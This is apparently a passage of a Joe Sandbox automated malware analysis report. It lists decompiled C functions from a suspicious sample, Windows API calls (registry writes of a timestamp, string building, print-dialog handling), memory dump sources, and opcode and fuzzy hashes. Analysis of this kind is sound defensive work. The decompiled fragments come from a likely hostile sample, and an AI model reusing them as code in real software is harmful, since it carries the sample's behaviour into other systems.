                                                                                                                                                                                                                                                                                            • Part of subcall function 000F4890: GetVersionExA.KERNEL32(?), ref: 000F48CA
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,All Files (*.*),00000000), ref: 000FAD81
                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000104), ref: 000FAD97
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 000FADA6
                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000001), ref: 000FADB0
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _memsetlstrcpynlstrlen$Version
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1695601350-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 9391da0691837b8b9b527c9c4a2d5b9ad519429a8b0f2d277fad51fb217b0bd7
                                                                                                                                                                                                                                                                                          • Instruction ID: d624e14e6bca8b33f042025c53de578d2c144b5980a3bc5db155e0cb098dc14a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9391da0691837b8b9b527c9c4a2d5b9ad519429a8b0f2d277fad51fb217b0bd7
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A2159B0500B049FD761CF29D884AABFBF8FB4A704F00882EE59AC7A51D7B5E4458F61
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02528BF0
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,00000000), ref: 02528C2C
                                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 02528C3A
                                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 02528C52
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 02528C5C
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseLocalOpenTimeValuewsprintf
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3926099652-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 83430b772c59bbdeed60bba09c01023e2731fd6bdc7614ae23355633b367ee6e
                                                                                                                                                                                                                                                                                          • Instruction ID: ba39d68038e71bb2233e971fe4c5a890f5e7e0d943bd926bdf0d81117e8c492e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83430b772c59bbdeed60bba09c01023e2731fd6bdc7614ae23355633b367ee6e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92213275901218AFEB14DFD4D889FFE7778FB48700F048568FA00AA1C0D7799644CB65
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E040073C0(long _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                                                                                                          				long _t24;
                                                                                                                                                                                                                                                                                          				char* _t26;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                                          					_t24 = _a4;
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t24 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                                          						_v20 = E040016F0(_a8, _a12);
                                                                                                                                                                                                                                                                                          						_t26 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                          						_v8 = _t26;
                                                                                                                                                                                                                                                                                          						E04007D20(_t26,  &_v36, 0, 0x10);
                                                                                                                                                                                                                                                                                          						wsprintfA( &_v36, "%u", _v20);
                                                                                                                                                                                                                                                                                          						_v12 = 0x80000001;
                                                                                                                                                                                                                                                                                          						if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          							_v12 = 0x80000002;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v16 = 0;
                                                                                                                                                                                                                                                                                          						_t24 = RegOpenKeyExA(_v12, _v8, 0, 0xf003f,  &_v16);
                                                                                                                                                                                                                                                                                          						if(_t24 == 0) {
                                                                                                                                                                                                                                                                                          							GetLocalTime( &_v52);
                                                                                                                                                                                                                                                                                          							RegSetValueExA(_v16,  &_v36, 0, 3,  &_v52, 0x10);
                                                                                                                                                                                                                                                                                          							return RegCloseKey(_v16);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t24;
                                                                                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                                                                                          0x040073ca
                                                                                                                                                                                                                                                                                          0x040073e4
                                                                                                                                                                                                                                                                                          0x040073eb
                                                                                                                                                                                                                                                                                          0x04007401
                                                                                                                                                                                                                                                                                          0x04007404
                                                                                                                                                                                                                                                                                          0x04007409
                                                                                                                                                                                                                                                                                          0x04007414
                                                                                                                                                                                                                                                                                          0x04007429
                                                                                                                                                                                                                                                                                          0x04007432
                                                                                                                                                                                                                                                                                          0x04007442
                                                                                                                                                                                                                                                                                          0x04007444
                                                                                                                                                                                                                                                                                          0x04007444
                                                                                                                                                                                                                                                                                          0x0400744b
                                                                                                                                                                                                                                                                                          0x04007465
                                                                                                                                                                                                                                                                                          0x0400746d
                                                                                                                                                                                                                                                                                          0x04007473
                                                                                                                                                                                                                                                                                          0x0400748b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04007495
                                                                                                                                                                                                                                                                                          0x0400746d
                                                                                                                                                                                                                                                                                          0x040073eb
                                                                                                                                                                                                                                                                                          0x0400749e

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 04007429
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,00000000), ref: 04007465
                                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 04007473
                                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 0400748B
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04007495
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseLocalOpenTimeValuewsprintf
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3926099652-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 5b6941f17f7e1ce7d1a6ef015ad0abb591c00484f45a97b9485d98f3a3167c0d
                                                                                                                                                                                                                                                                                          • Instruction ID: 829c9f2afe597629132b3bb77bbcf1684e2940429f06bc569247a29e29dd4590
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b6941f17f7e1ce7d1a6ef015ad0abb591c00484f45a97b9485d98f3a3167c0d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 442112B5900208ABEB14DFA4D849FFE77B8FB48704F048558FA15AB180D77DAA44CB51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04009650(intOrPtr _a4, intOrPtr _a8, CHAR* _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                                          				signed char _v25;
                                                                                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                                          					_v24 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                                          					while(_v12 < _a8 && _v24 < _a16) {
                                                                                                                                                                                                                                                                                          						_v25 =  *((intOrPtr*)(_a4 + _v12));
                                                                                                                                                                                                                                                                                          						E04007D20(_a4 + _v12,  &_v20, 0, 8);
                                                                                                                                                                                                                                                                                          						E04009560(_v25 & 0x000000ff,  &_v20, 7);
                                                                                                                                                                                                                                                                                          						_t58 = _t58 + 0x18;
                                                                                                                                                                                                                                                                                          						lstrcatA(_a12,  &_v20);
                                                                                                                                                                                                                                                                                          						_v24 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                                          						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(lstrlenA(_a12) > _a16) {
                                                                                                                                                                                                                                                                                          						_a12[_a16] = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v8 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                                          0x04009656
                                                                                                                                                                                                                                                                                          0x04009661
                                                                                                                                                                                                                                                                                          0x04009685
                                                                                                                                                                                                                                                                                          0x04009696
                                                                                                                                                                                                                                                                                          0x04009699
                                                                                                                                                                                                                                                                                          0x040096b1
                                                                                                                                                                                                                                                                                          0x040096bc
                                                                                                                                                                                                                                                                                          0x040096cf
                                                                                                                                                                                                                                                                                          0x040096d4
                                                                                                                                                                                                                                                                                          0x040096df
                                                                                                                                                                                                                                                                                          0x040096ef
                                                                                                                                                                                                                                                                                          0x040096f8
                                                                                                                                                                                                                                                                                          0x040096f8
                                                                                                                                                                                                                                                                                          0x0400970a
                                                                                                                                                                                                                                                                                          0x04009712
                                                                                                                                                                                                                                                                                          0x04009712
                                                                                                                                                                                                                                                                                          0x0400971f
                                                                                                                                                                                                                                                                                          0x0400971f
                                                                                                                                                                                                                                                                                          0x04009728

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04009690
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000), ref: 040096DF
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 040096E9
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04009701
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04009719
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 493641738-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 8467699368807e0697c2a8f8d306fbd68601f1d2da39666beca5ff7786e62213
                                                                                                                                                                                                                                                                                          • Instruction ID: 5d62f8ff5c671b513c9f4ed5768570a6b0eac4432c67e9f412687076ede29f23
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8467699368807e0697c2a8f8d306fbd68601f1d2da39666beca5ff7786e62213
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D213DB1900349EFEB14CFA4D884BEE7BB5FF44305F148558E914A7281D378AA94CB91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E00102C90(CHAR* __esi, intOrPtr _a4, struct HDC__** _a8, struct tagRECT* _a12, long _a16) {
                                                                                                                                                                                                                                                                                          				int _t20;
                                                                                                                                                                                                                                                                                          				signed int _t25;
                                                                                                                                                                                                                                                                                          				int _t26;
                                                                                                                                                                                                                                                                                          				int _t38;
                                                                                                                                                                                                                                                                                          				struct HDC__** _t39;
                                                                                                                                                                                                                                                                                          				CHAR* _t40;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t40 = __esi;
                                                                                                                                                                                                                                                                                          				_t26 = _t25 | 0xffffffff;
                                                                                                                                                                                                                                                                                          				_t38 = 0;
                                                                                                                                                                                                                                                                                          				if(lstrlenA(__esi) > 0) {
                                                                                                                                                                                                                                                                                          					while(_t40[_t38] != 9) {
                                                                                                                                                                                                                                                                                          						_t38 = _t38 + 1;
                                                                                                                                                                                                                                                                                          						if(_t38 < lstrlenA(_t40)) {
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t26 = _t38;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L5:
                                                                                                                                                                                                                                                                                          				_t39 = _a8;
                                                                                                                                                                                                                                                                                          				SetTextColor( *_t39, _a16);
                                                                                                                                                                                                                                                                                          				_t20 = DrawTextA( *_t39, _t40, _t26, _a12,  !(( *(_a4 + 0x85) & 0x000000ff) << 0x12) & 0x00100000 | 0x00000024);
                                                                                                                                                                                                                                                                                          				if(_t26 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          					_t11 =  &(_t40[1]); // 0x1
                                                                                                                                                                                                                                                                                          					return DrawTextA( *_t39,  &(_t11[_t26]), 0xffffffff, _a12,  !(( *(_a4 + 0x85) & 0x000000ff) << 0x12) & 0x00100000 | 0x00000026);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t20;
                                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                                          0x00102c90
                                                                                                                                                                                                                                                                                          0x00102c96
                                                                                                                                                                                                                                                                                          0x00102c99
                                                                                                                                                                                                                                                                                          0x00102ca3
                                                                                                                                                                                                                                                                                          0x00102ca5
                                                                                                                                                                                                                                                                                          0x00102cac
                                                                                                                                                                                                                                                                                          0x00102cb5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00102cb7
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00102cb5
                                                                                                                                                                                                                                                                                          0x00102cb9
                                                                                                                                                                                                                                                                                          0x00102cb9
                                                                                                                                                                                                                                                                                          0x00102cbb
                                                                                                                                                                                                                                                                                          0x00102cbe
                                                                                                                                                                                                                                                                                          0x00102cc5
                                                                                                                                                                                                                                                                                          0x00102cec
                                                                                                                                                                                                                                                                                          0x00102cf5
                                                                                                                                                                                                                                                                                          0x00102d18
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00102d1e
                                                                                                                                                                                                                                                                                          0x00102d27

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,749217C0,00000000,?,00102212,?,?,?,00000000,?,?,?,?,?,?,?), ref: 00102C9B
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00102212,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00102CAD
                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 00102CC5
                                                                                                                                                                                                                                                                                          • DrawTextA.USER32(?,?,00000000,?,00000001), ref: 00102CEC
                                                                                                                                                                                                                                                                                          • DrawTextA.USER32(00000001,00000001,000000FF,?,00000001), ref: 00102D1E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Text$Drawlstrlen$Color
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2432876991-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 382ed6648be62ee6c6abd92ec3e921815551cc1e212b1d72ceaa18bfa3b6b9d8
                                                                                                                                                                                                                                                                                          • Instruction ID: 806754afdab780ee2aaae510e8b689c54ae057fb386dd8b8bf2ccb863332d6b2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 382ed6648be62ee6c6abd92ec3e921815551cc1e212b1d72ceaa18bfa3b6b9d8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2911A375100105AFE3198F28DDC8EBA3B69EF893A4F108315F8A6832D1DBB4DC91DB60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                          			E000FAF50(intOrPtr __ecx, intOrPtr __edi, void* __esi, intOrPtr _a8, unsigned int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                                                                          				intOrPtr _t14;
                                                                                                                                                                                                                                                                                          				intOrPtr _t15;
                                                                                                                                                                                                                                                                                          				signed int _t21;
                                                                                                                                                                                                                                                                                          				intOrPtr _t24;
                                                                                                                                                                                                                                                                                          				intOrPtr _t30;
                                                                                                                                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t33;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t31 = __edi;
                                                                                                                                                                                                                                                                                          				_t24 = __ecx;
                                                                                                                                                                                                                                                                                          				_t14 =  *((intOrPtr*)(__edi + 0x24));
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t14 + 4)) == 0) {
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t14 + 4)) = __ecx;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t33 = _t31 + 8;
                                                                                                                                                                                                                                                                                          				if(_t33 == 0) {
                                                                                                                                                                                                                                                                                          					RaiseException(0xc0000005, 1, 0, 0);
                                                                                                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                                                                                                          					_t15 = _t24;
                                                                                                                                                                                                                                                                                          					if(_a20 != 0 || _a8 != 0x111) {
                                                                                                                                                                                                                                                                                          						L8:
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t27 = _a12;
                                                                                                                                                                                                                                                                                          						if(0x400 != _a12) {
                                                                                                                                                                                                                                                                                          							goto L8;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *_a20 = E000FD5E0(_t15, _t27 >> 0x10, 0x400, _a16);
                                                                                                                                                                                                                                                                                          							return 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					 *_t33 = _t31;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t33 + 4)) = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          					EnterCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          					_t30 =  *0x170c80; // 0x0
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t33 + 8)) = _t30;
                                                                                                                                                                                                                                                                                          					 *0x170c80 = _t33;
                                                                                                                                                                                                                                                                                          					LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          					_t21 = PrintDlgA( *(_t31 + 0x24));
                                                                                                                                                                                                                                                                                          					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          					 *(_t31 + 4) = 0;
                                                                                                                                                                                                                                                                                          					return  ~_t21 + 2;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                                                                          0x000faf50
                                                                                                                                                                                                                                                                                          0x000faf50
                                                                                                                                                                                                                                                                                          0x000faf50
                                                                                                                                                                                                                                                                                          0x000faf58
                                                                                                                                                                                                                                                                                          0x000faf5a
                                                                                                                                                                                                                                                                                          0x000faf5a
                                                                                                                                                                                                                                                                                          0x000faf5d
                                                                                                                                                                                                                                                                                          0x000faf62
                                                                                                                                                                                                                                                                                          0x000fafb9
                                                                                                                                                                                                                                                                                          0x000fafbf
                                                                                                                                                                                                                                                                                          0x000fafc7
                                                                                                                                                                                                                                                                                          0x000fafc9
                                                                                                                                                                                                                                                                                          0x000fb001
                                                                                                                                                                                                                                                                                          0x000fb004
                                                                                                                                                                                                                                                                                          0x000fafd4
                                                                                                                                                                                                                                                                                          0x000fafd4
                                                                                                                                                                                                                                                                                          0x000fafdf
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fafe1
                                                                                                                                                                                                                                                                                          0x000faff6
                                                                                                                                                                                                                                                                                          0x000faffe
                                                                                                                                                                                                                                                                                          0x000faffe
                                                                                                                                                                                                                                                                                          0x000fafdf
                                                                                                                                                                                                                                                                                          0x000faf64
                                                                                                                                                                                                                                                                                          0x000faf64
                                                                                                                                                                                                                                                                                          0x000faf71
                                                                                                                                                                                                                                                                                          0x000faf74
                                                                                                                                                                                                                                                                                          0x000faf7a
                                                                                                                                                                                                                                                                                          0x000faf80
                                                                                                                                                                                                                                                                                          0x000faf88
                                                                                                                                                                                                                                                                                          0x000faf8e
                                                                                                                                                                                                                                                                                          0x000faf98
                                                                                                                                                                                                                                                                                          0x000fafa0
                                                                                                                                                                                                                                                                                          0x000fafa2
                                                                                                                                                                                                                                                                                          0x000fafad
                                                                                                                                                                                                                                                                                          0x000fafad

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 000FAF66
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00170C68), ref: 000FAF74
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00170C68), ref: 000FAF8E
                                                                                                                                                                                                                                                                                          • PrintDlgA.COMDLG32(?), ref: 000FAF98
                                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C0000005,00000001,00000000,00000000,?), ref: 000FAFB9
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FD5E0: GetCurrentThreadId.KERNEL32 ref: 000FD613
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FD5E0: EnterCriticalSection.KERNEL32(00170C68), ref: 000FD621
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FD5E0: LeaveCriticalSection.KERNEL32(00170C68), ref: 000FD63D
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FD5E0: CallWindowProcA.USER32 ref: 000FD662
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$CurrentEnterLeaveThread$CallExceptionPrintProcRaiseWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 358716633-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 858d7063b0b317a1e78b96ff7d61ad14549128d3567e6e647486777ad3cd3cd6
                                                                                                                                                                                                                                                                                          • Instruction ID: 9cb697de087302f102126afb876733d3dc05ce21d6ad8c1c7c4813083dd678a9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 858d7063b0b317a1e78b96ff7d61ad14549128d3567e6e647486777ad3cd3cd6
